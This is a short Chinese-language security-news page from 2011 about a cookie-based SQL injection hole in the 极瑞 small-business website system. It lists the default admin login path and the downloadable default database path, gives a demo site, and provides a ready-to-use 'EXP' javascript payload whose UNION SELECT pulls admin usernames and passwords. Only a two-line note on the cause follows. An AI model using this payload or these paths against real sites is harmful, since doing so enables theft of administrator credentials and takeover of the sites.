您当前的位置:首页 > 最新文章/业内新闻

极瑞企业网站系统cookie 注入漏洞

时间:2011-06-16 09:53:50  来源:心芯文章  作者:心芯 QQ:31855347

 

极瑞企业网站系统cookie 注入漏洞
极瑞企业网站系统是为中小型企业专门定制的小型企业站源代码,代码全部免费公开,可以自行修改学习使用,但严禁用于商业用途。系统前台界面清洁简单,后台功能强大,最适合企业展示型的网站。
默认后台:admin/login.asp
默认数据库:database/%23zhiyuan_date_1003.mdb
官方演示站:http://www.li07.com/demo/01/
漏洞:cookie注入
EXP:
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,2,admin,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from admin"));
漏洞形成原因分析:1 数据库防下载#使用不当
                  2 COOKISE 过滤不严
来顶一下
近回首页
返回首页
发表评论 共有条评论
用户名: 密码:
验证码: 匿名发表
推荐资讯
网页防篡改核心技术探讨(一)静态页面(原创)
网页防篡改核心技术探
Discuz! X2 SQL注射漏洞,支持Union
Discuz! X2 SQL注射漏
关于千博CMS系统
关于千博CMS系统
什么是robots.txt要怎么写?
什么是robots.txt要怎
相关文章
    无相关信息
栏目更新
栏目热门